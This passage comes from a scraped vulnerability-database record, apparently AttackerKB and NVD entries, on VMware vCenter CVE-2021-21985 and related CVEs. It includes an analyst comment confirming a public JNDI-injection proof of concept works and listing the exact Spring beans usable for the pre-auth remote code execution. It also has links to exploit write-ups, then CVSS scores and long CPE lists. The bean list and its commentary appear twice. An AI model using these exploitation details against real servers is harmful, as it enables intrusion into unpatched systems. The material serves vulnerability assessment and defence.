multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\n**ccondon-r7** at May 26, 2021 5:41pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21985", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-29T00:00:00", "id": "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "href": "https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:55:53", "description": "The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21973", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973"], "modified": "2021-08-24T10:59:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-21973", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21973", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:55:54", "description": "OpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before ESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21974", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21974"], "modified": "2021-06-03T18:15:00", "cpe": ["cpe:/o:vmware:esxi:6.7", "cpe:/o:vmware:esxi:7.0.0", "cpe:/o:vmware:esxi:6.5"], "id": "CVE-2021-21974", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21974", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:6.7:670-201912101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004406:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810232:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201811002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-20191004001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0.0:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202011001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201911402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202102001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202008001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201912401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201810002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202006001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0.0:u1a:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810230:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201911001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201908001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201703001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202010001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201810001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201807001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202102001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201811301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:2:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201803001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201906002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201712001:*:*:*:*:*:*", 